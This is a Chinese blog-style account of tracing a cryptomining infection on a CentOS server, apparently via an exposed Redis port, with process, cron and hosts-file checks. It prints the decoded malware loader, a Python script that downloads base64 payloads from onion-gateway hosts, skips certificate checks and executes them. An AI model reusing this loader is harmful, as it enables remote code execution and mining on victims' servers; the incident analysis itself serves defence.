在centos服务器中一次排查挖矿病毒的经过
前言
作为良好公民从来没黑别人想不到被别人黑了。。诶。。。
经过
查了种种资料,确认是redis的6379端口被入侵了,这是变种病毒:
kthroltlds
好了,
下面来看看top任务栏有哪些可疑的地方:
ps -aux --sort=-pcpu|head -10
得到:
恩。。python2竟然直接exec执行base64字符串解码的代码,可怕。。
将base64解码看看里面的内容:
#coding: utf-8
import base64
import urllib2
import ssl
HOST="https://an7kmd2wp4xo7hpr"
RPATH1="src/sc"
d1=HOST+".onion.pet/"+RPATH1
d2=HOST+".onion.ws/"+RPATH1
d3=HOST+".onion.ly/"+RPATH1
def ld(url, t):
try:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
except Exception:
ctx=False
if ctx:
page=base64.b64decode(urllib2.urlopen(url,timeout=t,context=ctx).read())
else:
page=base64.b64decode(urllib2.urlopen(url,timeout=t).read())
return page
try:
try:
page=ld(d1, 175)
exec(page)
except Exception:
page=ld(d2, 175)
exec(page)
except Exception:
page=ld(d3, 175)
exec(page)
pass
诶?追踪一下作恶的网站,看看:
https://an7kmd2wp4xo7hpr.onion.ws/src/sc
网络真的是无序之地,这个估计是没经过国内备案的。。。怎么禁用这网站好。。
哦。。我想到了。。。修改本地域名指向,我欺骗不了别人我可以欺骗自己。。
vim /etc/hosts
---将这个垃圾站禁止
-- onion.ws 指向本地
127.0.0.1 localhost onion.ws
检查
ls /etc/rc.d
下面的:
init.d rc0.d rc1.d rc2.d rc3.d rc4.d rc5.d rc6.d rc.local
看看有没有定时任务。
检查crontab -l看看有没有定时任务
检查:
ls /etc/cron
下面的定时任务:
cron.d/ cron.daily/ cron.deny cron.hourly/ cron.monthly/ crontab cron.weekly/
发现:
ls /etc/cron.d/
0hourly sysstat
里面的内容是:
# Run the hourly jobs
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
01 * * * * root run-parts /etc/cron.hourly
追下去:
#!/bin/sh
# Check whether 0anacron was run today already
if test -r /var/spool/anacron/cron.daily; then
day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
exit 0;
fi
# Do not run jobs when on battery power
if test -x /usr/bin/on_ac_power; then
/usr/bin/on_ac_power >/dev/null 2>&1
if test $? -eq 1; then
exit 0
fi
fi
/usr/sbin/anacron -s
这是系统自带的,没问题。
基本核查了一次,好,重启等病毒再出现。
不过首先要停止redis,禁止redis开机启动。